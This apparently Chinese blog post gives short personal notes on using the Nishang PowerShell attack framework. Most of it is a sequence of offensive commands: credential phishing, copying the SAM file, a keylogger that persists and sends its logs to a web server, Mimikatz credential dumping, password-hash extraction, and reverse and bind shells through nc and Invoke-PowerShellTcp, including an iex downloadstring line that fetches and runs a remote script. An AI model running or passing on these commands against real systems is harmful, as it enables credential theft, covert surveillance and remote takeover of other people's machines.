首页 > 其他分享 >tmp01

tmp01

时间:2025-01-04 11:56:01浏览次数:6  
标签:Invoke Get Keylogger PowerShellTcp 192.168 ps1 tmp01

非必要检查
Nishang要在Powershell 3.0以上的环境中才可以正常使用
get-host
get-information#查看更加详细信息
Get-ExecutionPolicy
默认为:restricted
至少:remotesigned
get-command -module nishang
查看命令帮助,以Get-Information为例:
Get-Help Get-Information -full
在powershell下可以直接用out-file转到其它文件
PS D:nishang-master> Get-Information | Out-File res.txt

加载方式1,由于调用深度溢出,脚本失败。用2

需要管理员状态才可以修改

Import-Module -verbose .\nishang.psm1
加载方式2,在本地写一个文件zou.ps1然后运行,内容如下(第一句为导入脚本,没有其它语句会返回错误,所以随便多加了一个ps1语句)
zou.ps1:
Import-Module ./nishang.psm1
get-host

运行

1机器虚拟机判断,hyper-v machine一般是物理机

Check-VM

2登陆账号

invoke-credentialsphish,这个是pin账号密码,不是屏幕的登陆密码

3保存sam文件

Copy-VSS //将会直接把Sam文件保存在当前路径下
Copy-VSS -DestinationDir C:\Temp //指定保存sam文件的路径

4 Keylogger(键盘记录)

用第一种和最后一种剩下的不管,要输的随意
.Keylogger.ps1
Get-Help .\Gather\Keylogger.ps1 -Full#查看运行方式的4种方式
PS > .Keylogger.ps1 //直接以这种方式来运行,键盘记录会保存在当前用户的Temp目录下key文件中
PS > .Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis //-CheckURL参数会去检查所给出的网页之中是否包含 -MagicString后的字符串,如果存在的话就停止使用记录。
PS > .Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php //将记录指定发送给一个可以记录Post请求的Web服务器
PS > .Keylogger.ps1 -persist //实现持久化记录(重启后依然进行记录)

5 Invoke-Mimikatz(抓取密码)

Invoke-Mimikatz -DumpCreds

6 Get-PassHashes(获取Hash值)

Get-PassHashes

7 获取用户的密码提示信息

Get-PassHints

8 连接

反向连接
kali: nc -lvp 3344
目标机:Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.80 -Port 4444
正向连接
目标机:Invoke-PowerShellTcp -Bind -Port 3333
kali:nc -nv 192.168.1.1 3333

远程加载执行方式

反向
iex(new-object net.webclient).downloadstring("http://192.168.1.1:8000/Invoke-PowerShellTcp.ps1");Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.80 -Port 3344
正向
powershell
iex(new-object net.webclient).downloadstring("http://192.168.1.1:8000/Invoke-PowerShellTcp.ps1");Invoke-PowerShellTcp -Bind -Port 3344

blog.csdn.net/weixin_43679009/article/details/110071132

标签:Invoke,Get,Keylogger,PowerShellTcp,192.168,ps1,tmp01
From: https://www.cnblogs.com/zouk/p/18651731

相关文章